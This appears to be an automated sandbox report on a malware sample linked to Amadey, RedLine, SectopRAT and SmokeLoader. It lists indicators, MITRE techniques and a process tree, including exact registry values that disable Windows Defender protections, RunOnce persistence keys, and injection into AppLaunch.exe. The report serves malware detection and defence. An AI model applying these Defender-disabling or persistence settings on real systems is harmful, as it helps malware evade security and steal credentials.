amadey | 4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	2A8A.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	2A8A.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	2A8A.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	2A8A.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	2A8A.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	2A8A.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 34 IoCs

resource	yara_rule
behavioral2/memory/116-86-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral2/files/0x0009000000023183-98.dat	family_redline
behavioral2/memory/2208-100-0x00000000005E0000-0x000000000063A000-memory.dmp	family_redline
behavioral2/files/0x0009000000023183-105.dat	family_redline
behavioral2/memory/4448-158-0x0000000000040000-0x0000000000198000-memory.dmp	family_redline
behavioral2/files/0x000400000001e476-174.dat	family_redline
behavioral2/files/0x000400000001e476-173.dat	family_redline
behavioral2/memory/5580-178-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral2/memory/2140-175-0x00000000020D0000-0x000000000212A000-memory.dmp	family_redline
behavioral2/memory/4448-194-0x0000000000040000-0x0000000000198000-memory.dmp	family_redline
behavioral2/files/0x0007000000023173-200.dat	family_redline
behavioral2/files/0x0007000000023173-199.dat	family_redline
behavioral2/memory/3908-213-0x00000000000D0000-0x00000000000EE000-memory.dmp	family_redline
behavioral2/memory/5964-232-0x00000000006C0000-0x00000000006FE000-memory.dmp	family_redline
behavioral2/memory/5564-257-0x00000000005D0000-0x000000000062A000-memory.dmp	family_redline
behavioral2/memory/6004-324-0x0000000004400000-0x000000000445C000-memory.dmp	family_redline
behavioral2/memory/6004-358-0x0000000007160000-0x00000000071BA000-memory.dmp	family_redline
behavioral2/memory/6004-381-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-386-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-388-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-392-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-395-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-397-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-400-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-404-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-407-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-410-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-412-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-416-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-427-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-429-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-431-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-438-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline
behavioral2/memory/6004-444-0x0000000007160000-0x00000000071B5000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 3 IoCs

resource	yara_rule
behavioral2/files/0x0009000000023183-98.dat	family_sectoprat
behavioral2/files/0x0009000000023183-105.dat	family_sectoprat
behavioral2/memory/3908-213-0x00000000000D0000-0x00000000000EE000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Downloads MZ/PE file

.NET Reactor proctector 20 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/6004-324-0x0000000004400000-0x000000000445C000-memory.dmp	net_reactor
behavioral2/memory/6004-358-0x0000000007160000-0x00000000071BA000-memory.dmp	net_reactor
behavioral2/memory/6004-381-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-386-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-388-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-392-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-395-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-397-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-400-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-404-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-407-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-410-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-412-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-416-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-427-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-429-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-431-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-438-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-444-0x0000000007160000-0x00000000071B5000-memory.dmp	net_reactor
behavioral2/memory/6004-623-0x0000000002340000-0x0000000002440000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	2E63.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	explothe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	3308.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	oneetx.exe

Executes dropped EXE 22 IoCs

pid	Process
5020	FF5F.exe
3916	xr0Td0It.exe
2540	1B2.exe
912	xN2sf8rg.exe
4892	ET5IP1EJ.exe
3632	tG9gH5xJ.exe
4696	770.exe
4656	1Gq90PX8.exe
1736	2A8A.exe
2268	2E63.exe
2132	3308.exe
2208	372F.exe
3908	475D.exe
4448	4CBD.exe
2140	5009.exe
5356	explothe.exe
5564	5308.exe
5964	2QN962xW.exe
6004	5A1E.exe
5616	oneetx.exe
3620	oneetx.exe
3428	explothe.exe

Loads dropped DLL 1 IoCs

pid	Process
1368	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	2A8A.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	xN2sf8rg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	ET5IP1EJ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	tG9gH5xJ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	FF5F.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	xr0Td0It.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Detected potential entity reuse from brand microsoft.
phishing microsoft

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4112 set thread context of 3388	4112	4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f.exe	87
PID 2540 set thread context of 2876	2540	1B2.exe	108
PID 4656 set thread context of 4916	4656	1Gq90PX8.exe	124
PID 4696 set thread context of 116	4696	770.exe	126
PID 4448 set thread context of 5580	4448	4CBD.exe	154

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
2796	4112	WerFault.exe	83
3304	2540	WerFault.exe	97
3212	4656	WerFault.exe	109
4552	4916	WerFault.exe	124
620	4696	WerFault.exe	113

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
6040	schtasks.exe
5736	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3388	AppLaunch.exe
3388	AppLaunch.exe
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found
3152	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3152	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3388	AppLaunch.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeDebugPrivilege	1736	2A8A.exe
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found
Token: SeCreatePagefilePrivilege	3152	Process not Found
Token: SeShutdownPrivilege	3152	Process not Found

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
2132	3308.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe
3716	msedge.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3152	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4112 wrote to memory of 3388	4112	4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f.exe	87
PID 4112 wrote to memory of 3388	4112	4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f.exe	87
PID 4112 wrote to memory of 3388	4112	4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f.exe	87
PID 4112 wrote to memory of 3388	4112	4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f.exe	87
PID 4112 wrote to memory of 3388	4112	4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f.exe	87
PID 4112 wrote to memory of 3388	4112	4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f.exe	87
PID 3152 wrote to memory of 5020	3152	Process not Found	95
PID 3152 wrote to memory of 5020	3152	Process not Found	95
PID 3152 wrote to memory of 5020	3152	Process not Found	95
PID 5020 wrote to memory of 3916	5020	FF5F.exe	96
PID 5020 wrote to memory of 3916	5020	FF5F.exe	96
PID 5020 wrote to memory of 3916	5020	FF5F.exe	96
PID 3152 wrote to memory of 2540	3152	Process not Found	97
PID 3152 wrote to memory of 2540	3152	Process not Found	97
PID 3152 wrote to memory of 2540	3152	Process not Found	97
PID 3916 wrote to memory of 912	3916	xr0Td0It.exe	99
PID 3916 wrote to memory of 912	3916	xr0Td0It.exe	99
PID 3916 wrote to memory of 912	3916	xr0Td0It.exe	99
PID 3152 wrote to memory of 4896	3152	Process not Found	100
PID 3152 wrote to memory of 4896	3152	Process not Found	100
PID 912 wrote to memory of 4892	912	xN2sf8rg.exe	102
PID 912 wrote to memory of 4892	912	xN2sf8rg.exe	102
PID 912 wrote to memory of 4892	912	xN2sf8rg.exe	102
PID 4892 wrote to memory of 3632	4892	ET5IP1EJ.exe	103
PID 4892 wrote to memory of 3632	4892	ET5IP1EJ.exe	103
PID 4892 wrote to memory of 3632	4892	ET5IP1EJ.exe	103
PID 2540 wrote to memory of 1460	2540	1B2.exe	105
PID 2540 wrote to memory of 1460	2540	1B2.exe	105
PID 2540 wrote to memory of 1460	2540	1B2.exe	105
PID 2540 wrote to memory of 1208	2540	1B2.exe	114
PID 2540 wrote to memory of 1208	2540	1B2.exe	114
PID 2540 wrote to memory of 1208	2540	1B2.exe	114
PID 2540 wrote to memory of 2928	2540	1B2.exe	107
PID 2540 wrote to memory of 2928	2540	1B2.exe	107
PID 2540 wrote to memory of 2928	2540	1B2.exe	107
PID 2540 wrote to memory of 2876	2540	1B2.exe	108
PID 2540 wrote to memory of 2876	2540	1B2.exe	108
PID 2540 wrote to memory of 2876	2540	1B2.exe	108
PID 2540 wrote to memory of 2876	2540	1B2.exe	108
PID 2540 wrote to memory of 2876	2540	1B2.exe	108
PID 2540 wrote to memory of 2876	2540	1B2.exe	108
PID 2540 wrote to memory of 2876	2540	1B2.exe	108
PID 2540 wrote to memory of 2876	2540	1B2.exe	108
PID 2540 wrote to memory of 2876	2540	1B2.exe	108
PID 2540 wrote to memory of 2876	2540	1B2.exe	108
PID 3152 wrote to memory of 4696	3152	Process not Found	113
PID 3152 wrote to memory of 4696	3152	Process not Found	113
PID 3152 wrote to memory of 4696	3152	Process not Found	113
PID 3632 wrote to memory of 4656	3632	tG9gH5xJ.exe	109
PID 3632 wrote to memory of 4656	3632	tG9gH5xJ.exe	109
PID 3632 wrote to memory of 4656	3632	tG9gH5xJ.exe	109
PID 3152 wrote to memory of 1736	3152	Process not Found	116
PID 3152 wrote to memory of 1736	3152	Process not Found	116
PID 3152 wrote to memory of 2268	3152	Process not Found	117
PID 3152 wrote to memory of 2268	3152	Process not Found	117
PID 3152 wrote to memory of 2268	3152	Process not Found	117
PID 4896 wrote to memory of 2664	4896	cmd.exe	118
PID 4896 wrote to memory of 2664	4896	cmd.exe	118
PID 3152 wrote to memory of 2132	3152	Process not Found	120
PID 3152 wrote to memory of 2132	3152	Process not Found	120
PID 3152 wrote to memory of 2132	3152	Process not Found	120
PID 4656 wrote to memory of 5000	4656	1Gq90PX8.exe	123
PID 4656 wrote to memory of 5000	4656	1Gq90PX8.exe	123
PID 4656 wrote to memory of 5000	4656	1Gq90PX8.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f.exe
"C:\Users\Admin\AppData\Local\Temp\4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4112
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3388
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 252
  2⤵
  - Program crash
  PID:2796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4112 -ip 4112
1⤵
PID:1560

C:\Users\Admin\AppData\Local\Temp\FF5F.exe
C:\Users\Admin\AppData\Local\Temp\FF5F.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5020
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xr0Td0It.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xr0Td0It.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3916
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xN2sf8rg.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xN2sf8rg.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:912
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ET5IP1EJ.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ET5IP1EJ.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:4892
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tG9gH5xJ.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tG9gH5xJ.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:3632
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Gq90PX8.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Gq90PX8.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4656
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:5000
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:4916
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 196
        8⤵
        Program crash
        
        PID:4552
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 148
        7⤵
        Program crash
        
        PID:3212
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2QN962xW.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2QN962xW.exe
        6⤵
        Executes dropped EXE
        
        PID:5964

C:\Users\Admin\AppData\Local\Temp\1B2.exe
C:\Users\Admin\AppData\Local\Temp\1B2.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2540
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:1460
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:2928
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:2876
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:1208
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 268
  2⤵
  - Program crash
  PID:3304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\397.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:4896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
  2⤵
  PID:2664
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe71c146f8,0x7ffe71c14708,0x7ffe71c14718
    3⤵
    PID:4444
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,15813340754539802934,1680463166261357015,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
    3⤵
    PID:5256
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,15813340754539802934,1680463166261357015,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
    3⤵
    PID:5248
